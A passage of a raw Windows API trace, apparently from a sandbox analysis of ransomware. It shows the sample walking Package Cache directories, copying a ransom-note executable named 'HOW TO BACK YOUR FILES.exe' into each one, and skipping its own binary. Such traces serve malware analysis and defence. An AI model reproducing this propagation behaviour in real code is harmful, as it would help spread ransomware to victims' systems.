Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0090.066] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0090.066] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.066] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.066] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.066] GetLastError () returned 0x0 [0090.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.066] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.067] CloseHandle (hObject=0x120) returned 1 [0090.067] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.067] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.067] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.067] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.067] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0090.067] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0090.067] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.067] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.068] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.068] GetLastError () returned 0x0 [0090.068] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.068] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.068] CloseHandle (hObject=0x120) returned 1 [0090.069] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.069] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.069] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.069] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.069] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0090.069] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0090.070] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.070] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.070] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.070] GetLastError () returned 0x0 [0090.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.070] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.070] CloseHandle (hObject=0x120) returned 1 [0090.071] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.071] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x62e17880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x62e17880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.071] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.071] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.071] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0090.071] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0090.071] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.071] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.072] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.072] GetLastError () returned 0x0 [0090.072] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.072] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.072] CloseHandle (hObject=0x120) returned 1 [0090.072] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.072] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x62e89ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x62e89ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.072] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.072] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.073] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0090.073] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0090.073] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.073] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.073] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.074] GetLastError () returned 0x0 [0090.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.074] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.074] CloseHandle (hObject=0x120) returned 1 [0090.074] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.074] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.074] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.074] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.074] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0090.074] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0090.074] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.074] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.075] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.075] GetLastError () returned 0x0 [0090.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.075] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.075] CloseHandle (hObject=0x120) returned 1 [0090.075] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.076] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.076] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.076] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.076] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0090.076] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0090.076] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.076] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.077] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.077] GetLastError () returned 0x0 [0090.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.077] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.077] CloseHandle (hObject=0x120) returned 1 [0090.077] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.077] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x62fba7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x62fba7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.077] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.077] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.077] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" [0090.078] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" [0090.078] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.078] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.078] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.078] GetLastError () returned 0x0 [0090.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.078] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.079] CloseHandle (hObject=0x120) returned 1 [0090.079] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.079] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.079] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.079] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.079] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" [0090.079] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" [0090.079] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.079] CopyFileW 